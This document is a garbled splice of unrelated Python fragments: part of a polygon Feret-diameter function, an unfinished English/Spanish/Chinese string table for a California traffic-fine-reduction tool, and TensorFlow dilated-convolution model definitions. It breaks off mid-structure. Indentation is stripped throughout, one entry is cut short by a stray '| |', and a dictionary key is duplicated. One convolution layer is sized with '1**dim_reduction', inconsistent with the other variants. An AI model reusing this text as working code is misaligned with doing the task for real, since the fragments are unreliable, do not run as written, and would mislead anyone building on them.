    Return the Feret diameter of the object 'sth' along the direction theta (y over x, in degrees). 'sth' can either be polys (list of poly) or a poly (array of shape (N,2)). Only high contours are considered.
Parameters
----------
sth: either polys or poly
polys: list of poly
poly: (N*2) ndarray of double
list of corner coordinates (r,c) of the polygon.
theta: (float)
        the angle of the direction being measured, y over x, in degrees.
Returns
----------
d_feret: (float)
the Feret's diameter in pix
"""
# define unit vector (r,c)=(y,x) along the direction of theta
listpoints = np.ndarray([0,2])
if ispolys(sth):
polys = sth
for poly in polys:
if SignedPolygonArea(poly)>0.:
listpoints = np.append(listpoints,poly,axis=0)
elif ispoly(sth):
poly=sth
if SignedPolygonArea(poly)>0.:
listpoints = np.append(listpoints,poly,axis=0)
else:
raise ValueError('input is neither a poly nor polys')
unitvec=np.array([np.sin(np.radians(theta)),np.cos(np.radians(theta))])
d = listpoints.dot(unitvec)
dotmax=np.max(d,axis=0)
dotmin=np.min(d,axis=0)
return np.absolute(dotmax-dotmin)
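# Worked example (the unit square from the notation demo near the top of this
# file): FeretDiameter(square, 0.) projects onto the column (x) axis and
# returns 1.0, while FeretDiameter(square, 45.) measures the diagonal and
# returns sqrt(2) ~= 1.414.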
def FeretRadius(sth, theta, xc, yc):
"""
    Like FeretDiameter, but returns the max radius (distance between the edge and the centroid) along the direction theta.
Parameters
----------
sth: either polys or poly
theta: (float)
        the angle of the direction being measured, y over x, in degrees.
xc, yc: (float)
the centroid coordinate
Returns
----------
r_feret: (float)
        the Feret radius in pix
"""
    # define unit vector (r,c)=(y,x) along the direction
# -*- coding: utf-8 -*-
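# Each entry below maps a message id to its translations, keyed by language
# code: 'en', 'es', 'zh-s' (simplified Chinese) and 'zh-t' (traditional
# Chinese). Lookup example: _translations["yes"]["es"] -> "Sí"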
_translations = {
"req_fine_reduction": {
"en": "###Request a Fine Reduction",
"es": "###Cómo solicitar una reducción de multa",
"zh-s": "###请求减少罚款",
"zh-t": "###請求減少罰款"
},
"landing_page_description": {
"en":
"""*This online system is an optional way to request a fine reduction for your traffic ticket in cases of financial need.*
**Use this tool to:**
* Request a reduction in your traffic fine
* Request a payment plan
* Request Community Service
* Request more time to pay your ticket
**Do not use this tool:**
* If you wish to contest the ticket
* If your offense is a misdemeanor violation
* If you would like to attend traffic school
* If you have proof of correction and would like a dismissal or reduction of those charges
Please refer to your courtesy notice or contact your court instead.""",
"es":
"""*Este sistema en línea es una manera opcional de solicitar una reducción en su multa de tránsito debido a una necesidad económica.*
**Use este servicio para solicitar:**
* Una reducción de su multa de tránsito
* Un plan de pagos
* Servicio comunitario
* Más tiempo para pagar su multa
**No use este servicio:**
* Si quiere disputar la multa
* Si su ofensa es una violación por delito menor
* Si desea asistir a la escuela de tránsito
* Si tiene un comprobante de corrección y desea reducir la multa
Por favor refiérase a su aviso de cortesía o comuníquese con su corte.
""",
"zh-s":
"""*如果您有财务需要,本在线系统是请求减少交通罚单罚款的可选途径。*
**使用该工具请求:**
* 减少您的交通罚款
* 支付计划
* 社区服务
* 延长支付罚单时间
*如果您想对罚单提出异议,或者亲自解决问题,请联系您的法院。请参阅您的提醒通知。*""",
"zh-t":
"""*如果您有財務需求,本線上系統是請求減少交通罰單罰款的途徑之一。*
**使用本工具請求:**
* 減少您的交通罰款
* 付款計劃
* 社區服務
* 延長支付罰單的時間
*如果您想對罰單提出異議,或是親自解決問題,請聯繫您的法院。請參閱您的提醒通知。*"""
},
"lookup_citation": {
"en": "### Look Up Your Citation",
"es": "### Busque su citación",
"zh-s": "### 查看您的罚单",
"zh-t": "### 查看您的罰單"
},
"what_county": {
"en": "What California county did you get the citation in?",
"es": "¿En qué condado de California recibió la citación?",
"zh-s": "您在加州哪个县得到罚单?",
"zh-t": "您在加州哪個縣得到罰單?"
},
"what_citation_number": {
"en": "What's the citation number?",
"es": "¿Cuál es el número de citación?",
"zh-s": "罚单号码是多少?",
"zh-t": "罰單號碼是多少?"
},
"dont_have_citation_number": {
"en": "I don't have my citation number",
"es": "No tengo mi número de citación",
"zh-s": "我没有罚单号码",
"zh-t": "我沒有罰單號碼"
},
"what_first_name": {
"en": "What is your first name?",
"es": "¿Cuál es su nombre?",
"zh-s": "您的名字是什么?",
"zh-t": "您的名字是什麼?"
},
"what_last_name": {
"en": "What is your last name?",
"es": "¿Cuál es su apellido?",
"zh-s": "您的姓是什么?",
"zh-t": "您的姓是什麼?"
},
"what_dob": {
"en": "What's your date of birth?",
"es": "¿Cuál es su fecha de nacimiento?",
"zh-s": "您的出生日期是哪天?",
"zh-t": "您的出生日期是哪天?"
},
"what_license_number": {
"en": "What is your Driver's License Number?",
"es": "¿Cuál es el número de su licencia de manejar?",
"zh-s": "您的驾照号码是多少?",
"zh-t": "您的駕照號碼是多少?"
},
"name": {
"en": "Name",
"es": "Nombre",
"zh-s": "姓名",
"zh-t": "姓名"
},
"citation_number": {
"en": "Citation Number",
"es": "Número de citación",
"zh-s": "罚单号码",
"zh-t": "罰單號碼"
},
"county": {
"en": "County",
"es": "Condado",
"zh-s": "县",
"zh-t": "縣"
},
"violation_date": {
"en": "Violation Date",
"es": "Fecha de la infracción",
"zh-s": "违规日期",
"zh-t": "違規日期"
},
"total_due": {
"en": "Total Due",
"es": "Monto que se debe",
"zh-s": "应付总额",
"zh-t": "應付總額"
},
"yes": {
"en": "Yes",
"es": "Sí",
"zh-s": "是",
"zh-t": "是"
},
"no": {
"en": "No",
"es": "No",
"zh-s": "没有",
"zh-t": "否"
},
"your_citations": {
"en": "### Your Citations",
"es": "### Sus citaciones",
"zh-s": "",
"zh-t": ""
},
"need_more_info": {
"en": "We need some more information to find your citation: ",
"es": "Necesitamos más información para encontrar su citación:",
"zh-s": "",
"zh-t": ""
},
"found_multiple_citations": {
"en": "We found your citation. We also looked for other citations in your name in {county} County. You can request fine reductions for all the citations listed below.",
"es": "Encontramos su citación. También buscamos otras citaciones bajo su nombre en el condado de {county}. Puede solicitar una reducción en las multas para todas las citaciones que aparecen abajo.",
"zh-s": "",
"zh-t": ""
},
"select_citation": {
"en": "Select each of the tickets for which you want to request a reduction.",
"es": "Seleccione las citaciones para las que desea solicitar una reducción.",
"zh-s": "",
"zh-t": ""
},
"none_of_these_are_right": {
"en": "None of these are right",
"es": "Ninguna de estas es mía",
"zh-s": "",
"zh-t": ""
},
"how_this_works": {
"en": "### How this works",
"es": "### Cómo funciona este servicio",
"zh-s": "### 如何运作",
"zh-t": "### 如何運作"
},
"dont_have_citation_number": {
"en": "I don't have my citation number",
"es": "No tengo mi número de citación",
"zh-s": "我没有罚单号码",
"zh-t": ""
},
"how_works_instructions": {
"en": """
*We will walk you through a few questions to help the Court better understand your need for a reduction.*
Be prepared to share information about your income, monthly expenses and any public benefits you currently receive. A court official will still review your answers as they would if you came to court in person.
""",
"es": """
*Le haremos algunas preguntas para que la corte pueda comprender mejor su necesidad de reducir la multa.*
Esté preparado para compartir información sobre sus ingresos, gastos mensuales y cualquier beneficio público que recibe actualmente. Sus respuestas serán revisadas por un funcionario judicial como si fuera a la corte en persona.
""",
"zh-s": """
*我们将通过几个问题帮助法院更好地了解您要减少罚款的需求。*
请准备好分享您的收入、每月开支及目前领取的公共福利。法院官员仍然会像您亲自来法院一样审查您的答案。
""",
"zh-t": """
*我們將透過幾個問題幫助法院更瞭解您要減少罰款的需求。*
請準備好分享您的收入、每月開支及目前領取的公共福利。法院官員仍然會像您親自來法院一樣審查您的答案。
"""
},
"public_benefits": {
"en": "### Public Benefits",
"es": "### Beneficios públicos",
"zh-s": "### 公共福利",
"zh-t": "### 公共福利"
},
"receiving_benefits": {
"en": "Are you currently receiving any benefits? If you don''t see the public benefit you are currently enrolled in, click \"Other\".",
"es": "¿Está recibiendo beneficios actualmente? Si no ve el beneficio público que está recibiendo actualmente, haga clic en \"Otro\".",
"zh-s": "您目前是否在领取任何福利?如果您没有看到您目前登记的公共福利,点击“其他”",
"zh-t": "您目前是否領取任何福利?如果您沒有看到您目前登記的公共福利,請點選「其他」"
},
"cal_fresh": {
"en": "CalFresh (Food Stamps)",
"es": "CalFresh (cupones de alimentos)",
"zh-s": "CalFresh(食品券)",
"zh-t": "CalFresh(糧食券)"
},
"medi_cal": {
"en": "Medi-Cal",
"es": "Medi-Cal",
"zh-s": "Medi-Cal",
"zh-t": "Medi-Cal"
},
"cr_ga": {
"en": "General Assistance / County Relief",
"es": "Ayuda general/Ayuda del condado",
"zh-s": "普通救助/ 县救济",
"zh-t": "普通救助/ 縣救濟"
},
"ssi": {
"en": "SSI: Supplemental Security Income",
"es": "SSI: Seguridad de ingreso suplementario",
"zh-s": "SSI:社会安全补助金",
"zh-t": "SSI:社會安全補助金"
},
"wic": {
"en": "WIC: Special Supplemental Nutrition for Women, Infants and Children",
"es": "WIC: Programa de Nutrición y Alimentos para Mujeres, Bebés y Niños",
"zh-s": "",
"zh-t": ""
},
"ssp": {
"en": "SSP: State Supplemental Payment",
"es": "SSP: Pagos suplementarios del estado",
"zh-s": "SSP:州补助金",
"zh-t": "SSP:州補助金"
},
"ihss": {
"en": "IHSS: In Home Supportive Services",
"es": "IHSS: Servicios de apoyo en el hogar",
"zh-s": "IHSS:居家支持服务",
"zh-t": "IHSS:居家支援服務"
},
"cal_works": {
"en": "CalWORKS: California Work Opportunity and Responsibility to Kids Act",
"es": "CalWORKs: Oportunidades de trabajo y responsabilidades hacia los niños de California",
"zh-s": "CalWORKS:《加州工作机会及对孩子责任法案》",
"zh-t": "CalWORKS:《加州工作機會及對孩子責任法案》"
},
"tanf": {
"en": "TANF: Temporary Assistance for Needy Families",
"es": "TANF: Ayuda temporal para familias necesitadas",
"zh-s": "TANF:穷困家庭临时救助",
"zh-t": "TANF:窮困家庭臨時救助"
},
"capi": {
"en": "CAPI: Cash Assistance Program for Aged, Blind or Disabled Legal Immigrants",
"es": "CAPI: Programa de ayuda en efectivo para inmigrantes legales ancianos, no videntes o discapacitados",
"zh-s": "CAPI:老人、盲人或残障合法移民现金救助计划",
"zh-t": "CAPI:老人、盲人或殘障合法移民現金救助計畫"
},
"other": {
"en": "Other",
"es": "Otro",
"zh-s": "其他",
"zh-t": "其他"
},
"other_benefit_name": {
"en": "What's the other public benefit you receive?",
"es": "¿Cómo se llama el beneficio público que recibe? Nota: debe responder esta pregunta en inglés.",
"zh-s": "",
"zh-t": ""
},
"proof_calfresh": {
"en": "Proof of CalFresh",
"es": "### Comprobante de CalFresh",
"zh-s": "### CalFresh 的证明",
"zh-t": ""
},
"calfresh_upload": {
"en": "### You said you receive CalFresh. Can you please upload any document that proves you are currently receiving this benefit - like a CalFresh card?",
"es": "### Usted dijo que recibe CalFresh. ¿Puede subir un documento que demuestre que está recibiendo actualmente este beneficio, como por ejemplo una tarjeta de CalFresh?",
"zh-s": "",
"zh-t": ""
},
"calfresh_card": {
"en": "CalFresh Card",
"es": "Tarjeta de CalFresh",
"zh-s": "",
"zh-t": ""
},
"have_no_proof": {
"en": "I don't have proof available",
"es": "No tengo un comprobante en este momento",
"zh-s": "我现在没有证明",
"zh-t": "我現在沒有證明"
},
"why_no_proof": {
"en": "Tell us why you can't provide documentation at this time",
"es": "Explique por qué no puede darnos documentación en este momento. Nota: debe responder esta pregunta en inglés.",
"zh-s": "告诉我们您为何现在不能提供文件",
"zh-t": "告訴我們您為何現在不能提供文件"
},
"proof_of_medical": {
"en": "### Proof of Medi-Cal",
"es": "### Comprobante de Medi-Cal",
"zh-s": "###Medi-Cal 的证明",
"zh-t": ""
},
"upload_medical": {
"en": | |
import numpy as np
import tensorflow as tf
import sys
import gc
import time
#from tensorflow.python.ops import rnn_cell
from tensorflow.python.ops.rnn import bidirectional_dynamic_rnn
from tf_utils import variable_summaries, _batch_norm
from custom_ops import atrous_pool2d
def weight_variable(shape, name=None):
initial = tf.truncated_normal(shape, stddev=0.1)
w_var = tf.Variable(initial, name=name)
    if name is not None:
variable_summaries(w_var, name)
return w_var
def bias_variable(shape, name=None):
initial = tf.constant(0.1, shape=shape)
b_var = tf.Variable(initial, name=name)
    if name is not None:
variable_summaries(b_var, name)
return b_var
def conv2d(x, W):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def atrous_conv2d(x, W, rate):
return tf.nn.atrous_conv2d(x, W, rate, padding='SAME')
def max_pool(x, kH):
return tf.nn.max_pool(x, ksize=[1, kH, 1, 1],
strides=[1, 1, 1, 1], padding='SAME')
def atrous_pool(x, kH, dilation_rate):
return atrous_pool2d(x, ksize=[1, kH, 1, 1], rate=dilation_rate, padding="SAME", pooling_type="MAX")
# return tf.nn.pool(x, dilation_rate=[dilation_rate, 1], window_shape=[kH, 1],
# padding='VALID', pooling_type="MAX")
def dilated_convolution_model(x, y_, dropout_keep_prob, batch_size, noutputs, dim_reduction=10, nkernels=[128, 240, 50], hidden=125):
#dim_reduction = 10
#nkernels = [128, 240, 50]
#hidden = 125
embedding_size = 4
W = {
"conv1": weight_variable([1*dim_reduction, 1, embedding_size, nkernels[0]], "W_conv1"),
"conv2": weight_variable([dim_reduction, 1, nkernels[0], nkernels[1]], "W_conv2"),
"conv3": weight_variable([dim_reduction, 1, nkernels[1], nkernels[2]]),
"conv4": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv5": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv6": weight_variable([1*dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv6"),
#"conv7": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"hid1": weight_variable([nkernels[2], hidden]),
"hid2": weight_variable([hidden, noutputs]),
}
b = {
"conv1": bias_variable([nkernels[0]]),
"conv2": bias_variable([nkernels[1]]),
"conv3": bias_variable([nkernels[2]]),
"conv4": bias_variable([nkernels[2]]),
"conv5": bias_variable([nkernels[2]]),
"conv6": bias_variable([nkernels[2]]),
#"conv7": bias_variable([nkernels[2]]),
"hid1": bias_variable([hidden]),
"hid2": bias_variable([noutputs]),
}
embeddings = tf.Variable(tf.random_uniform([5, embedding_size]))
embed = tf.nn.embedding_lookup(embeddings, x)
    # add an empty axis for the height
embedded_image = tf.expand_dims(embed, 2)
# add the convolutional layers
h_conv1 = tf.nn.dropout(tf.nn.relu(tf.nn.conv2d(embedded_image, W["conv1"], strides=[1, 1*dim_reduction, 1, 1], padding='SAME') + b["conv1"]), dropout_keep_prob)
h_conv2 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv1, W["conv2"], 3) + b["conv2"]), dropout_keep_prob)
h_conv3 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv2, W["conv3"], 9) + b["conv3"]), dropout_keep_prob)
h_conv4 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv3, W["conv4"], 27) + b["conv4"]), dropout_keep_prob)
h_conv5 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv4, W["conv5"], 81) + b["conv5"]), dropout_keep_prob)
h_conv6 = tf.nn.dropout(tf.nn.relu(tf.nn.conv2d_transpose(h_conv5, W["conv6"], [batch_size, 25000, 1, nkernels[2]], [1, 1*dim_reduction, 1, 1]) + b["conv6"]), dropout_keep_prob)
flattened = tf.reshape(tf.squeeze(h_conv6), [batch_size*25000, nkernels[2]])
hid1 = tf.nn.dropout(tf.nn.relu(tf.matmul(flattened, W["hid1"]) + b["hid1"]), dropout_keep_prob)
outputs = tf.matmul(hid1, W["hid2"]) + b["hid2"]
return outputs, W, b, embed, [h_conv6]
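def _example_training_graph(batch_size=4, noutputs=2):
    # Illustrative sketch, not part of the original file: wires the model
    # above into a TF 1.x training graph. The sequence length 25000 matches
    # the hard-coded reshape in the model; the loss and optimizer choices
    # here are assumptions, not taken from the original code.
    x = tf.placeholder(tf.int32, [batch_size, 25000])
    y_ = tf.placeholder(tf.float32, [batch_size * 25000, noutputs])
    keep_prob = tf.placeholder(tf.float32)
    logits, W, b, embed, _ = dilated_convolution_model(x, y_, keep_prob,
                                                       batch_size, noutputs)
    loss = tf.reduce_mean(
        tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y_))
    train_op = tf.train.AdamOptimizer(1e-4).minimize(loss)
    return x, y_, keep_prob, loss, train_op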
def dilated_convolution_model_batchnorm(x, y_, dropout_keep_prob, batch_size, noutputs, is_training, decay_rate, dim_reduction=10, nkernels=[128, 240, 50], hidden=125):
# dim_reduction = 10
# nkernels = [128, 240, 50]
# hidden = 125
embedding_size = 4
W = {
"conv1": weight_variable([1*dim_reduction, 1, embedding_size, nkernels[0]], "W_conv1"),
"conv2": weight_variable([dim_reduction, 1, nkernels[0], nkernels[1]]),
"conv3": weight_variable([dim_reduction, 1, nkernels[1], nkernels[2]], "W_conv3"),
"conv4": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv5": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv6": weight_variable([1**dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv6"),
#"conv7": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"hid1": weight_variable([nkernels[2], hidden]),
"hid2": weight_variable([hidden, noutputs]),
}
b = {
"conv1": bias_variable([nkernels[0]]),
"conv2": bias_variable([nkernels[1]]),
"conv3": bias_variable([nkernels[2]]),
"conv4": bias_variable([nkernels[2]]),
"conv5": bias_variable([nkernels[2]]),
"conv6": bias_variable([nkernels[2]]),
#"conv7": bias_variable([nkernels[2]]),
"hid1": bias_variable([hidden]),
"hid2": bias_variable([noutputs]),
}
embeddings = tf.Variable(tf.random_uniform([5, embedding_size]))
embed = tf.nn.embedding_lookup(embeddings, x)
    # add an empty axis for the height
embedded_image = tf.expand_dims(embed, 2)
# add the convolutional layers
h_conv1 = tf.nn.conv2d(embedded_image, W["conv1"], strides=[1, 1*dim_reduction, 1, 1], padding='SAME') + b["conv1"]
h_conv1_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv1, is_training, decay_rate, "conv1-norm")), dropout_keep_prob)
h_conv2 = atrous_conv2d(h_conv1_norm, W["conv2"], 3) + b["conv2"]
h_conv2_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv2, is_training, decay_rate, "conv2-norm")), dropout_keep_prob)
h_conv3 = atrous_conv2d(h_conv2_norm, W["conv3"], 9) + b["conv3"]
h_conv3_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv3, is_training, decay_rate, "conv3-norm")), dropout_keep_prob)
h_conv4 = atrous_conv2d(h_conv3_norm, W["conv4"], 27) + b["conv4"]
h_conv4_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv4, is_training, decay_rate, "conv4-norm")), dropout_keep_prob)
h_conv5 = atrous_conv2d(h_conv4_norm, W["conv5"], 81) + b["conv5"]
h_conv5_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv5, is_training, decay_rate, "conv5-norm")), dropout_keep_prob)
h_conv6 = tf.nn.conv2d_transpose(h_conv5_norm, W["conv6"], [batch_size, 25000, 1, nkernels[2]], [1, 1*dim_reduction, 1, 1]) + b["conv6"]
h_conv6_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv6, is_training, decay_rate, "conv6-norm")), dropout_keep_prob)
flattened = tf.reshape(tf.squeeze(h_conv6_norm), [batch_size*25000, nkernels[2]])
hid1 = tf.nn.dropout(tf.nn.relu(tf.matmul(flattened, W["hid1"]) + b["hid1"]), dropout_keep_prob)
outputs = tf.matmul(hid1, W["hid2"]) + b["hid2"]
return outputs, W, b, embed, [h_conv6_norm]
def dilated_convolution_with_pooling(x, y_, dropout_keep_prob, batch_size, noutputs, dim_reduction=10, nkernels=[128, 240, 50], hidden=125):
# dim_reduction = 10
# nkernels = [128, 240, 50]
# hidden = 125
embedding_size = 4
filter_height = 5
W = {
"conv1": weight_variable([dim_reduction, 1, embedding_size, nkernels[0]], "W_conv1"),
"conv2": weight_variable([dim_reduction, 1, nkernels[0], nkernels[1]]),
"conv3": weight_variable([dim_reduction, 1, nkernels[1], nkernels[2]], "W_conv3"),
"conv4": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv5": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv6": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv6"),
# "conv7": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"hid1": weight_variable([nkernels[2], hidden]),
"hid2": weight_variable([hidden, noutputs]),
}
b = {
"conv1": bias_variable([nkernels[0]]),
"conv2": bias_variable([nkernels[1]]),
"conv3": bias_variable([nkernels[2]]),
"conv4": bias_variable([nkernels[2]]),
"conv5": bias_variable([nkernels[2]]),
"conv6": bias_variable([nkernels[2]]),
"conv7": bias_variable([nkernels[2]]),
"hid1": bias_variable([hidden]),
"hid2": bias_variable([noutputs]),
}
embeddings = tf.Variable(tf.random_uniform([5, embedding_size]))
embed = tf.nn.embedding_lookup(embeddings, x)
    # add an empty axis for the height
embedded_image = tf.expand_dims(embed, 2)
# add the convolutional layers
h_conv1 = tf.nn.dropout(tf.nn.relu(tf.nn.conv2d(embedded_image, W["conv1"], strides=[1, dim_reduction, 1, 1], padding='SAME') + b["conv1"]), dropout_keep_prob)
h_conv1_pooled = max_pool(h_conv1, filter_height)
h_conv2 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv1_pooled, W["conv2"], 3) + b["conv2"]), dropout_keep_prob)
h_conv2_pooled = max_pool(h_conv2, filter_height)
h_conv3 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv2_pooled, W["conv3"], 9) + b["conv3"]), dropout_keep_prob)
h_conv4 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv3, W["conv4"], 27) + b["conv4"]), dropout_keep_prob)
h_conv4_pooled = max_pool(h_conv4, filter_height)
h_conv5 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv4_pooled, W["conv5"], 81) + b["conv5"]), dropout_keep_prob)
h_conv6 = tf.nn.dropout(tf.nn.relu(tf.nn.conv2d_transpose(h_conv5, W["conv6"], [batch_size, 25000, 1, nkernels[2]], [1, dim_reduction, 1, 1]) + b["conv6"]), dropout_keep_prob)
flattened = tf.reshape(tf.squeeze(h_conv6), [batch_size*25000, nkernels[2]])
hid1 = tf.nn.dropout(tf.nn.relu(tf.matmul(flattened, W["hid1"]) + b["hid1"]), dropout_keep_prob)
outputs = tf.matmul(hid1, W["hid2"]) + b["hid2"]
return outputs, W, b, embed, [h_conv6]
def dilated_convolution_with_pooling_batchnorm(x, y_, dropout_keep_prob, batch_size, noutputs, is_training, decay_rate, dim_reduction=10, nkernels=[128, 240, 50], hidden=125):
# dim_reduction = 10
# nkernels = [128, 240, 50]
# hidden = 125
embedding_size = 4
filter_height = 5
W = {
"conv1": weight_variable([dim_reduction, 1, embedding_size, nkernels[0]], "W_conv1"),
"conv2": weight_variable([dim_reduction, 1, nkernels[0], nkernels[1]]),
"conv3": weight_variable([dim_reduction, 1, nkernels[1], nkernels[2]], "W_conv3"),
"conv4": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv5": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv6": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv6"),
# "conv7": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"hid1": weight_variable([nkernels[2], hidden]),
"hid2": weight_variable([hidden, noutputs]),
}
b = {
"conv1": bias_variable([nkernels[0]]),
"conv2": bias_variable([nkernels[1]]),
"conv3": bias_variable([nkernels[2]]),
"conv4": bias_variable([nkernels[2]]),
"conv5": bias_variable([nkernels[2]]),
"conv6": bias_variable([nkernels[2]]),
"conv7": bias_variable([nkernels[2]]),
"hid1": bias_variable([hidden]),
"hid2": bias_variable([noutputs]),
}
embeddings = tf.Variable(tf.random_uniform([5, embedding_size]))
embed = tf.nn.embedding_lookup(embeddings, x)
    # add an empty axis for the height
embedded_image = tf.expand_dims(embed, 2)
# add the convolutional layers
h_conv1 = tf.nn.conv2d(embedded_image, W["conv1"], strides=[1, dim_reduction, 1, 1], padding='SAME') + b["conv1"]
h_conv1_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv1, is_training, decay_rate, "conv1-norm")), dropout_keep_prob)
h_conv1_pooled = max_pool(h_conv1_norm, filter_height)
h_conv2 = atrous_conv2d(h_conv1_pooled, W["conv2"], 3) + b["conv2"]
h_conv2_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv2, is_training, decay_rate, "conv2-norm")), dropout_keep_prob)
h_conv2_pooled = max_pool(h_conv2_norm, filter_height)
h_conv3 = atrous_conv2d(h_conv2_pooled, W["conv3"], 9) + b["conv3"]
h_conv3_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv3, is_training, decay_rate, "conv3-norm")), dropout_keep_prob)
h_conv4 = atrous_conv2d(h_conv3_norm, W["conv4"], 27) + b["conv4"]
h_conv4_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv4, is_training, decay_rate, "conv4-norm")), dropout_keep_prob)
h_conv4_pooled = max_pool(h_conv4_norm, filter_height)
h_conv5 = atrous_conv2d(h_conv4_pooled, W["conv5"], 81) + b["conv5"]
h_conv5_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv5, is_training, decay_rate, "conv5-norm")), dropout_keep_prob)
h_conv6 = tf.nn.dropout(tf.nn.relu(tf.nn.conv2d_transpose(h_conv5_norm, W["conv6"], [batch_size, 25000, 1, nkernels[2]], [1, dim_reduction, 1, 1]) + b["conv6"]), dropout_keep_prob)
h_conv6_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv6, is_training, decay_rate, "conv6-norm")), dropout_keep_prob)
flattened = tf.reshape(tf.squeeze(h_conv6_norm), [batch_size*25000, nkernels[2]])
hid1 = tf.nn.dropout(tf.nn.relu(tf.matmul(flattened, W["hid1"]) + b["hid1"]), dropout_keep_prob)
outputs = tf.matmul(hid1, W["hid2"]) + b["hid2"]
return outputs, W, b, embed, [h_conv6_norm]
def dilated_convolution_with_dilated_pooling(x, y_, dropout_keep_prob, batch_size, noutputs, dim_reduction=10, nkernels=[128, 240, 50], hidden=125):
# dim_reduction = 10
# nkernels = [128, 240, 50]
# hidden = 125
embedding_size = 4
filter_height = 5
W = {
"conv1": weight_variable([dim_reduction, 1, embedding_size, nkernels[0]], "W_conv1"),
"conv2": weight_variable([dim_reduction, 1, nkernels[0], nkernels[1]]),
"conv3": weight_variable([dim_reduction, 1, nkernels[1], nkernels[2]], "W_conv3"),
"conv4": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv5": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv6": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv6"),
# "conv7": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"hid1": weight_variable([nkernels[2], hidden]),
"hid2": weight_variable([hidden, noutputs]),
}
b = {
"conv1": bias_variable([nkernels[0]]),
"conv2": bias_variable([nkernels[1]]),
"conv3": bias_variable([nkernels[2]]),
"conv4": bias_variable([nkernels[2]]),
"conv5": bias_variable([nkernels[2]]),
"conv6": bias_variable([nkernels[2]]),
"conv7": bias_variable([nkernels[2]]),
"hid1": bias_variable([hidden]),
"hid2": bias_variable([noutputs]),
}
embeddings = tf.Variable(tf.random_uniform([5, embedding_size]))
embed = tf.nn.embedding_lookup(embeddings, x)
    # add an empty axis for the height
embedded_image = tf.expand_dims(embed, 2)
# add the convolutional layers
h_conv1 = tf.nn.dropout(tf.nn.relu(tf.nn.conv2d(embedded_image, W["conv1"], strides=[1, dim_reduction, 1, 1], padding='SAME') + b["conv1"]), dropout_keep_prob)
h_conv2 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv1, W["conv2"], 3) + b["conv2"]), dropout_keep_prob)
h_conv3 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv2, W["conv3"], 9) + b["conv3"]), dropout_keep_prob)
h_conv4 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv3, W["conv4"], 27) + b["conv4"]), dropout_keep_prob)
h_conv4_pooled = atrous_pool(h_conv4, filter_height, 27)
h_conv5 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv4_pooled, W["conv5"], 81) + b["conv5"]), dropout_keep_prob)
h_conv5_pooled = atrous_pool(h_conv5, filter_height, 81)
h_conv6 = tf.nn.dropout(tf.nn.relu(tf.nn.conv2d_transpose(h_conv5_pooled, W["conv6"], [batch_size, 25000, 1, nkernels[2]], [1, dim_reduction, 1, 1]) + b["conv6"]), dropout_keep_prob)
flattened = tf.reshape(tf.squeeze(h_conv6), [batch_size*25000, nkernels[2]])
hid1 = tf.nn.dropout(tf.nn.relu(tf.matmul(flattened, W["hid1"]) + b["hid1"]), dropout_keep_prob)
outputs = tf.matmul(hid1, W["hid2"]) + b["hid2"]
return outputs, W, b, embed, [h_conv6]
def dilated_convolution_with_dilated_pooling_batchnorm(x, y_, dropout_keep_prob, batch_size, noutputs, is_training, decay_rate, dim_reduction=10, nkernels=[128, 240, 50], hidden=125):
# dim_reduction = 10
# nkernels = [128, 240, 50]
# hidden = 125
embedding_size = 4
filter_height = 5
W = {
"conv1": weight_variable([dim_reduction, 1, embedding_size, nkernels[0]], "W_conv1"),
"conv2": weight_variable([dim_reduction, 1, nkernels[0], nkernels[1]]),
"conv3": weight_variable([dim_reduction, 1, nkernels[1], nkernels[2]], "W_conv3"),
"conv4": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv5": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv6": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv6"),
